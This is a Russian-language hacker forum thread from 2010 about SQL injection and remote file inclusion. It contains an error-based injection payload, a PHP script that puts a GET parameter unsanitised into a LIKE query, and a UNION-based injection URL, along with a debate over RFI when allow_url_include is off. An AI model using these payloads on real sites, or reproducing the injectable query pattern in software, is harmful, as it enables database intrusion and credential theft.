
13.03.2010, 23:16
|
|
Новичок
Регистрация: 24.06.2007
Сообщений: 5
С нами:
9937515
Репутация:
3
|
|
0+or+(select+count(*)+from+information_schema.tabl es+group+by+concat(version(),floor(rand (0)*2)))
как работаит ета sql injection?
|
|
|

14.03.2010, 12:46
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
Сообщение от re-2
0+or+(select+count(*)+from+information_schema.tabl es+group+by+concat(version(),floor(rand (0)*2)))
как работаит ета sql injection?
Это вывод в ошибке
Сообщение от Jerri
Есть запрос - "SELECT ... FROM ... WHERE ... AND ... AND ... LIKE '%[SQL]%'"
Что сделать можно? 
PHP код:
<?PHP
$db_host = 'localhost';
$db_user = 'root';
$db_pass = '';
$db_name = 'job';
$con = mysql_connect($db_host,$db_user,$db_pass) or die(mysql_error());
mysql_selectdb($db_name,$con) or die(mysql_error());
$q = mysql_query("SELECT id,login,password FROM users WHERE id=1 AND login='ctacok' LIKE '%{$_GET['id']}%'") or die(mysql_error());
$row = mysql_fetch_assoc($q);
echo $row['id'];
echo $row['login'];
echo $row['password'];
?>
?id=1%'+AND+id=user()+union+select+user(),2,3+--+
Просто в чём соль, надо знать имя колонки.
Последний раз редактировалось Ctacok; 14.03.2010 в 12:52..
|
|
|

14.03.2010, 12:58
|
|
Участник форума
Регистрация: 12.07.2009
Сообщений: 158
С нами:
8859263
Репутация:
334
|
|
Сообщение от Ctacok
Это вывод в ошибке
PHP код:
<?PHP
$db_host = 'localhost';
$db_user = 'root';
$db_pass = '';
$db_name = 'job';
$con = mysql_connect($db_host,$db_user,$db_pass) or die(mysql_error());
mysql_selectdb($db_name,$con) or die(mysql_error());
$q = mysql_query("SELECT id,login,password FROM users WHERE id=1 AND login='ctacok' LIKE '%{$_GET['id']}%'") or die(mysql_error());
$row = mysql_fetch_assoc($q);
echo $row['id'];
echo $row['login'];
echo $row['password'];
?>
Просто в чём соль, надо знать имя колонки.
Понял,спс.
|
|
|

14.03.2010, 03:25
|
|
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
С нами:
9567396
Репутация:
23
|
|
G1G, значит прав не хватает, а на FreeBSD 7.2 ты их вряд ли поднимешь.
|
|
|

14.03.2010, 12:39
|
|
Участник форума
Регистрация: 12.07.2009
Сообщений: 158
С нами:
8859263
Репутация:
334
|
|
Есть запрос - "SELECT ... FROM ... WHERE ... AND ... AND ... LIKE '%[SQL]%'"
Что сделать можно? 
|
|
|

14.03.2010, 12:41
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
С нами:
8602291
Репутация:
256
|
|
Есть запрос - "SELECT ... FROM ... WHERE ... AND ... AND ... LIKE '%[SQL]%'"
Что сделать можно?
Выложи полностью адрес и запрос.
|
|
|

14.03.2010, 18:14
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами:
9100556
Репутация:
912
|
|
Этот хацкер пытается мне доказать,что при allow_url_include off возможно подключить УДАЛЕННЫЙ файл при RFI. Так вот,возможно ли вобще такое? на 99.9% уверен что нет
|
|
|

14.03.2010, 19:10
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Сообщение от .:[melkiy]:.
Этот хацкер пытается мне доказать,что при allow_url_include off возможно подключить УДАЛЕННЫЙ файл при RFI. Так вот,возможно ли вобще такое? на 99.9% уверен что нет
при allow_url_include off вообще не может быть речи об RFI
|
|
|

14.03.2010, 21:28
|
|
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
С нами:
9419426
Репутация:
648
|
|
Сообщение от Jokester
при allow_url_include off вообще не может быть речи об RFI
Откуда такая категоричность? Всё зависит от версии, на каких-то версиях можно легко заинклудить удалённый файл при allow_url_include=Off.
Универсального PoC у меня нет.
|
|
|

14.03.2010, 21:45
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Сообщение от Root-access
Откуда такая категоричность? Всё зависит от версии, на каких-то версиях можно легко заинклудить удалённый файл при allow_url_include=Off.
Универсального PoC у меня нет.
От версии чего это зависит?
И пример желательно
PS Только не тот который в РОА, пожалуйста, а что-нибудь своё
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|